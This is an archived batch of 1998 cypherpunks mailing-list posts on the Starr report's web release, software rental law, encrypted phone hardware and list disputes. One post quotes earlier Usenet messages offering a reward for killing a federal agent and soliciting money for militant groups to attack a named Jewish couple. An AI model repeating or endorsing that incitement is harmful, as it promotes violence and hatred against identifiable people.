> which notes that no one yet knows the digital format -- text,
> word processor or PDF images:
> 
>     http://www.house.gov/icreport/ (House Information Resources) 
> 
>     http://www.house.gov/judiciary (House Judiciary Committee) 
> 
>     http://thomas.loc.gov/icreport/ (Library of Congress) 
> 
>     http://www.access.gpo.gov/congress/icreport/ (Government Printing Office) 
> 
> If its PDF then the delay is surely deliberately planned to favor
> those with scratchback access.
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 11 Sep 1998 09:44:33 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Happy Fourth
In-Reply-To: <v0311070eb21dc3620425@[206.189.103.244]>
Message-ID: <v03110712b21ee3c3be48@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:11 PM -0500 9/10/98, Michael Motyka wrote:
>I'm -almost- ready to admit defeat and move on.
>
>> Did you see the part where I mention that I am (a) an ex-marine,
>IMHO Marines burn just like the rest of us wimps. They just don't scream
>as much.

	Yeah, but the part you cut was about being afraid of fire. I am
not, I respect it, but it doesn't frighten me.

>> You ever seen 3000 gallons of jet fuel burn,
>AOED the biggest fire I've seen was the fire here in CA last month. 6-8
>Million tires. Nobody had the balls to put that one out. At peak 1000X
>your jet fuel deal. Scary. Very.

	Yeah, but the 3000 gals. of waste fuel was deliberate, for training.

	Burning tires really suck. Almost impossible to get water, or any
coolant down into where the fire is burning, and the heating of the rubber
gives of some really noxious fumes.

>> 5 gals. of burning gasoline is NOT a problem.
>ISASI ( it sure as shit is ) if you're wearing it on your back.
>> 5 Gals. cooking off in a sealed container IS a problem.
>FYI 5 ounces mixed with compressed air in a metal container could easily
>be fatal.

	If you read my original post again, I talk about this very problem.

>> Fuck you.
>Yes, yes, PTMYT ( pleased to meet you too ).

	You suggested that I belong on AOL. I say again, Fuck You.

>Remember, shit draws flies. There'll just be more geniuses asking how to

	This is cypherpunks, we talk about what we want. Ask Tim.

>make noncryptographic devices. I would enjoy some crypto-tech talk.

	Ok, how about using fires as a source of entropy?

>Found any cool primitive polynomials lately? Got a good block cipher
>with a 4096 bit block size and an even bigger key space? Got some time
>to donate to actually put together some good HW/SW systems?

	Nope, not right now.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 11 Sep 1998 11:35:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <35F951FA.71B@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Bill,

Bill Stewart wrote:

> Not per se, though there _is_ still one major restriction -
> the Defense Department gets a crack at patent applications,
> so if you try to patent a crypto algorithm or crypto phone,
> they can seize and classify your patent application and
> working materials, using the excuse of "national security".
>
I suppose we need more altruistic gestures placing good stuff into the
public domain.

> Sure there are - my $150 cordless phone uses spread-spectrum,
> partly for better sound quality, partly for better privacy,
> and partly because it's simpler than picking individual channels.
>
The security is only between the handset and the base unit. Once the
signal hits the POTS it's the same old story - open line.

ALSO - the channels and the hopping sequence used in the
"spread-spectrum" systems are predefined. Kind of like making a stream
cipher with a very short bitstream you got from the government printing
orifice. Using any other sequence is a crime.

The real purpose of the spread spectrum phones is to allow increased
signal levels. The security is not robust.

Try this one:

Not particularly original - I would guess that Tim's 3DES phone is
something like this.

Wal Mart Plastics for the housing ( ever tooled plastics? $$$ )
Custom board
	Dedicated DSP for voice compression/decompression
	Modem chipset for POTS connect ( direct or ISP )
	Fast microP for encryption/protocol
	Any encryption algorithm you desire
	Software Developer's Kit ( roll your own algorithm )

This will work very nicely at home or with any cell phone that has a
modem port. It's really nothing but a dedicated version of a PC based
PGP phone. It's just smaller and cheaper than a PC and has no MS DLLs on
it.

Regards,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 11 Sep 1998 08:42:42 +0800
To: "'Bill Stewart'" <coderpunks@toad.com
Subject: RE: [off topic] ANNOUNCE: Bay Area Cypherpunks, Sat. Sept. 12, 12-6, KPMG Mountain View
Message-ID: <D104150098E6D111B7830000F8D90AE824063D@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




	Bill wrote:
	> KPMG is a relatively-unmarked building at the corner of
	> Middlefield Rd. and Ellis St. in Mountain View, surrounded by
Netscape.
	 
	Reading this, I flashed on an alternate meaning for 
	a second --

	'Surrounded by netscape'... netscaping, the cyberspace
	equivalent of landscaping...

	Just an odd image.


	Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Fri, 11 Sep 1998 09:52:37 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Bits are Bits
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928463C@mossbay.chaffeyhomes.com>
Message-ID: <v03102802b21ee05d03b0@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain



>* Software: OK to resell if license allows it, if original is destroyed, if
>no copies are kept, blah blah blah. (Very complicated.) Not legal to rent
>software since around the mid-80s, when software rental stores stopped.
...
>-- rental of videos is allowed. (Why videos but not CDs? What about books
>on tape? What about books on CD, either audio or CD-ROM?)

Another weird twist in this topic is the "distinction" that is made between
video games for consoles and the same games for computers. It is legal to
rent a PSX title such as Tomb Raider but the same title ported to the PC is
not legal to rent. I read about this a few years ago in an article by Trip
Hawkins, CEO of 3DO, so maybe this information is out of date. But I have
not yet seen CD-ROMs for rent or even available to check out for home use
from the public library. I think this distinction is sometimes confused
because a publisher can choose to allow a CD-ROM title to be rentable but
has to explicitly sanction that. But a publisher of game console CD's
cannot prevent its products from being rented.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 11 Sep 1998 11:57:17 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809111600.SAA12943@replay.com>
Message-ID: <Pine.GSO.3.95.980911095344.7166D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 11 Sep 1998, Anonymous wrote:

> The annoying thing about Clinton's recent behavior is that he never
> comes right out and apologizes, but the press always says he does.
> 
> Case in point:
> 
> > WASHINGTON (Reuters) - Saying ``I have sinned,'' a tearful President
> > Clinton made an impassioned plea Friday for forgiveness from Monica
> > Lewinsky and others and vowed to fight hard to keep his job.

Reuters' lede seems right:


	First, I want to say to all of you that, as you might imagine, I
have been on quite a journey these last few weeks to get to the end
of this, to the rock bottom truth of where I am and where we all are.
I agree with those who have said that in my first statement after I
testified I was not contrite enough.  I don't think there is a fancy
way to say that I have sinned.
	It is important to me that everybody who has been hurt know that
the sorrow I feel is genuine: first and most important, my family;
also my friends, my staff, my Cabinet, Monica Lewinsky and her
family, and the American people.  I have asked all for their
forgiveness.
	But I believe that to be forgiven, more than sorrow is required
-- at least two more things.  First, genuine repentance -- a
determination to change and to repair breaches of my own making.  I
have repented.  Second, what my bible calls a "broken spirit"; an
understanding that I must have God's help to be the person that I
want to be; a willingness to give the very forgiveness I seek; a
renunciation of the pride and the anger which cloud judgment, lead
people to excuse and compare and to blame and complain.
	Now, what does all this mean for me and for us?  First, I will
instruct my lawyers to mount a vigorous defense, using all available
appropriate arguments.  But legal language must not obscure the fact
that I have done wrong.  Second, I will continue on the path of
repentance, seeking pastoral support and that of other caring people
so that they can hold me accountable for my own commitment.
	Third, I will intensify my efforts to lead our country and the
world toward peace and freedom, prosperity and harmony, in the hope
that with a broken spirit and a still strong heart I can be used for
greater good, for we have many blessings and many challenges and so
much work to do.
	In this, I ask for your prayers and for your help in healing our
nation.  And though I cannot move beyond or forget this -- indeed, I
must always keep it as a caution light in my life -- it is very
important that our nation move forward.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Fri, 11 Sep 1998 09:04:17 +0800
To: Julian Assange <proff@iq.org>
Subject: Re: cypherpunks archive
Message-ID: <tw7g1dypwzc.fsf@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



(Looks like I left at about the right time...)

I'm definitely planning to bring the archive back now that it seems
worthwhile, but I'm highly tempted to move it outside the US.  I'm
giving somone a few more days trying to fix it, and if that fails,
I'll restore the drive physically.  (the problem is that my agent in
the US is being slow, and I'm a bit low on cash after moving hastily...)

Anyone have 1gb of disk space on a machine, optionally with root access,
on a machine with unmetered network access outside the US on which I
could put the archive?

I can put the archive here in AI, but I'll have to charge per megabyte,
as my t1 is metered-use :(  It would end up being something on the order of
$0.50/MB for total traffic, and unfortunately there are no good payment
systems for that kind of thing right now.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/   <-- brought down by a flakey hd controller or drive




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 10:20:20 +0800
To: Soren <sorens@workmail.com>
Subject: Re: Replay
In-Reply-To: <35F91060.1DA7BFC3@workmail.com>
Message-ID: <199809111520.LAA13955@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <35F91060.1DA7BFC3@workmail.com>, on 09/11/98 
   at 07:58 AM, Soren <sorens@workmail.com> said:


>Why isn't remailer@replay.com posting to cypherpunks?  I've sent several
>and none have shown up -- rants up in smoke.

So your this anonymous fellow we have been looking for. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNflBmo9Co1n+aLhhAQEF+wP/d/2AmHCcgSjugQPRbQ10VFAT9QRriW2t
0vso7OhXTjOrdFMwRBj8NgDhiH9rpv8sz/9yXaSY1OOizhxBalcKdMXEC9TPVY7X
AutqpnVJvhAglBaLZUhAmeeCrUG4HCaBKhAgjc7qqidbYo+IVf20vqBSiYx+SihH
fDwfWkz13FU=
=+wnK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 11 Sep 1998 12:34:49 +0800
To: John Young <jya@pipeline.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.GSO.3.95.980911092907.7166A-100000@well.com>
Message-ID: <Pine.GSO.3.95.980911103545.7166J-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



/cat:V/pri:U/sld:A/por:1/for:5/slu:BC-STARRREPORTTEXT Advisory -----
@TEXT
	<B>BC-Starr Report Text, Advisory,0057<P>
	<B>MANAGING EDITORS:<P>
	<B>WIRE EDITORS:<P>
	We are still awaiting the Starr report. We will advise immediately
when the report is available. Until then, please refrain from logging onto
the ftp sites. Otherwise, there is a danger of jamming the sites and
preventing us from posting the report.
	<B>The AP<P>
	APTV-09-11-98 1330EDT
	  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 11 Sep 1998 10:19:26 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Rental of PC software...
Message-ID: <199809111540.KAA11397@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

For those of you who believe it is completely illegal to rent PC software
should contact:

Star Techs
9222 Burnet Rd.
Austin, Tx.
512-719-4263

(sorry for the earlier mis-spelling of the name)

I'll also forward a reference regarding loaning copyrighted material and
who owns the rights to decide whether it is allowed or not.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 10:42:18 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Rental of PC software...
In-Reply-To: <199809111540.KAA11397@einstein.ssz.com>
Message-ID: <199809111542.LAA14230@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809111540.KAA11397@einstein.ssz.com>, on 09/11/98 
   at 10:40 AM, Jim Choate <ravage@EINSTEIN.ssz.com> said:

>For those of you who believe it is completely illegal to rent PC software
>should contact:

>Star Techs
>9222 Burnet Rd.
>Austin, Tx.
>512-719-4263

>(sorry for the earlier mis-spelling of the name)

>I'll also forward a reference regarding loaning copyrighted material and
>who owns the rights to decide whether it is allowed or not.

We used to have a store here called AtoZ Software that opened up a couple
of years back. They were srtictly a software rental store and were doing
*very* good business from it. They ran into quite a bit of trouble (SPA et
al) over it. I didn't follow it too close but I don't think that they rent
software any more. :(

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: It's OS/2, Jim, but not OS/2 as we know it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNflG0I9Co1n+aLhhAQGjVAQAhd8hUnctdsZ4jzxG3V8FYKw6xAplYqik
shu6lqVV9JWAhnEb3FisgI1GX2qx640eH6+lRqqn1kFA6TZhKBixyO1ECl4e8lhT
leCMjDLr2BXAUOEfobl7/1l5rB4JC0SXDbMJu5Uq+eP1GGcdaWETUr5baxXpyUz0
A7kyFJ+OD8g=
=5CPM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 11 Sep 1998 09:50:59 +0800
To: "'Graham-John Bullers'" <jya@pipeline.com>
Subject: RE: A Cypherpunk Trial, Yes
Message-ID: <D104150098E6D111B7830000F8D90AE824063F@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




	Graham-John Bullers [SMTP:real@EDMC.net] wrote:

	>As i'am one of persons mention in Toto's posts I
	>would just like to say I think the posts were a
	>joke.  With the help of of Vullis I was a pain to
	>the list and this was Toto's way of acknowledging
	>this To the government readers of this list,the
	>cigar was Cuban,will you put Bill in the cell with
	>Toto.

	I, too, was suprised to find myself mentioned in
	one of the postings John Young has highlighted.  I
	hadn't noticed this before, since Toto's rants
	were among the 50%+ of cpunks postings I marked as
	read without actually reading them.

	The Poster Currently Known As Toto mentioned an
	awful lot of people by name, purportedly engaged
	in all kinds of nefarious activities.  The same
	post also names Tim May, Adam Back, Declan
	McCullagh, Ulf Moller, Kent Crispen, and Blanc
	Weber. I'm let off easy, being characterized 
	as only a 'terroist [sic] InterNet forger'. 
	I think that this is because I once complained 
	when someone (possibly Toto) forged a message 
	in my name. To put it in the plainest possible
	terms: I have never in my life forged a message.

	Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 10:56:55 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: SNET: [FP] Alaska: Nearly 93% of new parents choose Enumeration At Birth (EAB)
In-Reply-To: <199809110836.BAA11054@netcom13.netcom.com>
Message-ID: <199809111557.LAA14444@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809110836.BAA11054@netcom13.netcom.com>, on 09/11/98 
   at 01:36 AM, "Vladimir Z. Nuri" <vznuri@netcom.com> said:

>This program has proven to be so popular with new parents that
>nearly 93% of all births transmitted to the Bureau request a social
>security number.

Of all the evils governments have done over the years, by far the worst
was convincing the slaves that they were really free.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNflKaI9Co1n+aLhhAQE2ZQP/Qd5m+8stY1CL7elrdGQUEEXbb2Kz2PYs
Y4XlBDd6AzkZ1nH82HnuK04vCbX9X8MwKBD299BYnwQ7kaDbOqiUwQFpNZc7P8Yf
Vknwil+DSqUclrur0lL7OGMNbIlqlA+NYj/ylkicy/T0bHxX+fGPaK3lnjMGQQLE
DoEBNFxz+Mk=
=RTFY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 11:02:23 +0800
To: John Young <jya@pipeline.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <199809111556.LAA02877@dewdrop2.mindspring.com>
Message-ID: <199809111602.MAA14549@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809111556.LAA02877@dewdrop2.mindspring.com>, on 09/11/98 
   at 11:50 AM, John Young <jya@pipeline.com> said:

>If its PDF then the delay is surely deliberately planned to favor those
>with scratchback access.

Well, considering that congress is still debating how much of the report
(if any) will go public I doubt that there are any great backscratching
conspiracies afoot.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: When DOS grows up it wants to be OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNflLn49Co1n+aLhhAQGZCgQAoObOqtvQhg7nJGz8ZtCtonLOkeI+4r3f
HW+x90496EiIvLxJy4ChWZSIuuMrB3tmoOCneJmnReCpU9oN5mjmAA7ORFfjJmTc
hbeAqQ/PDJdlz6nTWPoU3cRLAKFAXHdoIz+Lcr46T9ZXo7dcVSQ8q9xv0/VBnV0A
visY22/Z6fw=
=S9J9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 11 Sep 1998 10:51:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Copyright - Who has the right to loan?
Message-ID: <199809111613.LAA11683@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Sep 1998 10:56:22 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.GSO.3.95.980911081636.19934C-100000@well.com>
Message-ID: <199809111556.LAA02877@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Good piece, Declan. Is Time getting access to the restricted
Congressional Web site which offers the Starr report early for
members only drooling? Or are the major mediums getting
preferential copies in concert with the deliberately under-provided
House/Thomas/GPO rigs?

These are the four public access sites given by the NYT today,
which notes that no one yet knows the digital format -- text,
word processor or PDF images:

    http://www.house.gov/icreport/ (House Information Resources) 

    http://www.house.gov/judiciary (House Judiciary Committee) 

    http://thomas.loc.gov/icreport/ (Library of Congress) 

    http://www.access.gpo.gov/congress/icreport/ (Government Printing Office) 

If its PDF then the delay is surely deliberately planned to favor
those with scratchback access.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 11 Sep 1998 10:51:21 +0800
To: cypherpunks@cyberpass.net
Subject: RE: A Cypherpunk Trial, Yes
Message-ID: <199809111551.LAA25938@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   	Graham-John Bullers [SMTP:real@EDMC.net] wrote:
   >
   >   	>As i'am one of persons mention in Toto's posts I
   >   	>would just like to say I think the posts were a
   >   	>joke.  With the help of of Vullis I was a pain to
   >   	>the list and this was Toto's way of acknowledging
   >   	>this.
   >
   >    > To the government readers of this list...

Ah, yes, the good old days when Vulis was here.
---guy



*  Re: State Charges in Weaver Case
*
*  Dr.Dimitri Vulis KOTM (dlv@bwalk.dm.com)
*  Fri, 22 Aug 97 02:09:13 EDT
*
*  Mike Duvos <enoch@zipcon.net> writes:
*  >
*  > Shouldn't it be ... involuntary
*  > manslaughter for using possibly excessive force against an armed
*  > attacker?
*
*  No, it should be a $100 reward for icing a motherfucking fed.
*
*  ---
*
*  Dr.Dimitri Vulis KOTM
*  Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps


...and elsewhere in Usenet...

...soliciting funds for terrorist groups to kill a jewish couple:
 
#   Subject:      The final solution for the premature ejaculation problem
#   From:         shlomo@bwalk.dm.com (Rabbi Shlomo Ruthenberg)
#   Date:         1996/06/05
#   Organization: Young Israel of Red Hook
#   Newsgroups:   soc.culture.israel,soc.culture.jewish,alt.religion.islam,
#             alt.politics.white-Power,alt.2600,alt.revenge,alt.revisionism
#
#
#      As a religious Jew, I am shocked that none of: Hamas / Hizballah /
#      Party of God / Revolutionary Justice Organization / Organization
#      for the Oppressed on Earth / Islamic Jihad for the Liberation of
#      Palestine / Popular Democratic Front for the Liberation of Palestine
#      / Ansar Allah / Palestine Liberation Front / Followers of the
#      Prophet Muhammad / Revolutionary Organization of Socialist Muslims
#      / Fatah Revolutionary Council / Arab Revolutionary Brigades /
#      Islamic Resistance Movement / Vanguards of Conquest (whew!) have
#      gotten around porking the Jewish Fascist Yoni Kamens or his zonah
#      wife. You can help by mailing your donations (cash only) to:
#
#      Dr. Ramadan Abdullah Mohamed Shallah
#      Dr. Musa Abu-Marzuq
#      c/o Arab Republic of Palestine Mission to the United Nations
#      115 E 65 St, New York, NY 10023, tel: (212) 288-8500
#
#      Be sure to mark all envelopes "for the Yoni Kamens fund"!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Michael" <jmg123@hotmail.com>
Date: Fri, 11 Sep 1998 13:52:29 +0800
To: cypherpunks@cyberpass.net
Subject: Starr report
Message-ID: <19980911185240.16578.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.cnn.com/starr.report/

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Fri, 11 Sep 1998 13:57:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.GSO.3.95.980911103545.7166J-100000@well.com>
Message-ID: <v03102806b21f2230c736@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Burns:
>
>Is there any effort underway to mirror the report to various
>archives?  This is going to kill the DC internet corridor
>otherwise.
>
What I heard on the radio this morning was that the house
will press CD's that will be distributed to mirror servers
(presumably the major Internet news providers.)

Now, the real interesting question: will the files be
PGP-signed?

Martin Minow
minow@pobox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 11 Sep 1998 14:11:00 +0800
To: Jim Burnes <declan@well.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.GSO.3.95.980911103545.7166J-100000@well.com>
Message-ID: <v03130301b21f25a55e76@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:42 AM -0700 9/11/98, Jim Burnes wrote:
>On Fri, 11 Sep 1998, Declan McCullagh wrote:
>
>etc delete....
>
>Declan:
>
>Is there any effort underway to mirror the report to various
>archives?  This is going to kill the DC internet corridor
>otherwise.

Turn on the television. All of the networks and news stations are mirroring
it. The ones I've tried, cnn.com, foxnews.com, etc., are also swamped.
However, the talking heads--no pun intended--are all reading the sordid
details about Clinton's cigar being inserted into Monica's vagina, about
how Clinton talked with Congressional leaders while Monica was giving him a
blowjob, and how Clinton suborned perjury and tampered with evidence....

"The guy is going down...in more ways than one."

BTW, I had heard Matt Drudge on the cigar issue before Declan visited a few
weeks ago. I was able to "break" this story to Declan, no mean feat.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 11 Sep 1998 14:15:37 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Rental of PC software...
Message-ID: <33CCFE438B9DD01192E800A024C84A19284646@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




USC Title 17  109 subsec (b)(1)(A)

...unless authorized by the ...owner of copyright in a computer program
(including any tape, disk, or other medium embodying such program),
...[no] person in possession of a particular copy of a computer program
(including any tape, disk, or other medium embodying such program), may,
for the purposes of direct or indirect commercial advantage, dispose of,
or authorize the disposal of, the possession of that ...computer program
(including any tape, disk, or other medium embodying such program) by
rental, lease, or lending, or by any other act or practice in the nature
of rental, lease, or lending. ... The transfer of possession of a
lawfully made copy of a computer program by a nonprofit educational
institution to another nonprofit educational institution or to faculty,
staff, and students does not constitute rental, lease, or lending for
direct or indirect commercial purposes under this subsection. 
(B) This subsection does not apply to - 
(i) a computer program which is embodied in a machine or product and
which cannot be copied during the ordinary operation or use of the
machine or product; or 
(ii) a computer program embodied in or used in conjunction with a
limited purpose computer that is designed for playing video games and
may be designed for other purposes. 
...
(2)(A) Nothing in this subsection shall apply to the lending of a
computer program for nonprofit purposes by a nonprofit library, if each
copy of a computer program which is lent by such library has affixed to
the packaging containing the program a warning of copyright in
accordance with requirements that the Register of Copyrights shall
prescribe by regulation. 
(B) Not later than three years after the date of the enactment of the
Computer Software Rental Amendments Act of 1990, and at such times
thereafter as the Register of Copyright considers appropriate, the
Register of Copyrights, after consultation with representatives of
copyright owners and librarians, shall submit to the Congress a report
stating whether this paragraph has achieved its intended purpose of
maintaining the integrity of the copyright system while providing
nonprofit libraries the capability to fulfill their function. Such
report shall advise the Congress as to any information or
recommendations that the Register of Copyrights considers necessary to
carry out the purposes of this subsection. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Cypherpunk <carolann@censored.org>
Date: Fri, 11 Sep 1998 12:33:32 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Fighting DMV clerical errors in NYC:
In-Reply-To: <35F9594E.6CCD7C2F@brainlink.com>
Message-ID: <3.0.2.32.19980911123006.006ddfc4@pop.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

As a former NYC cabbie, the best way to resolve a DMV dispute
is to take the train to Albany and deal with it there. This way you
can access higher and higher levels of the DMV until the problem
is fixed. Albany has no where near the level of hassle that NY has.

cab8

At 01:09 PM 9/11/98 -0400, you wrote:
>
>A friend of mine asked me to forward this question to you guys:
>
>IMHO he needs a good lawyer, but maybe someone here knows mor
Member Internet Society  - Certified Mining Co. Guide  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.165.50.96
My Homepage
The Cyberdoc
***********************************************************************
Will lobby Congress for Food & Expenses!!!
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0
Comment: Totally uncensored from censored.org

iQA/AwUBNfleITiM2656VXArEQLc1wCeML7Kh1e0rQdCE/quIXcE9ge9RDAAn36+
znj/4ya+s8pHMj8tCl9o6tGy
=RdDc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 11 Sep 1998 13:39:02 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.GSO.3.95.980911103545.7166J-100000@well.com>
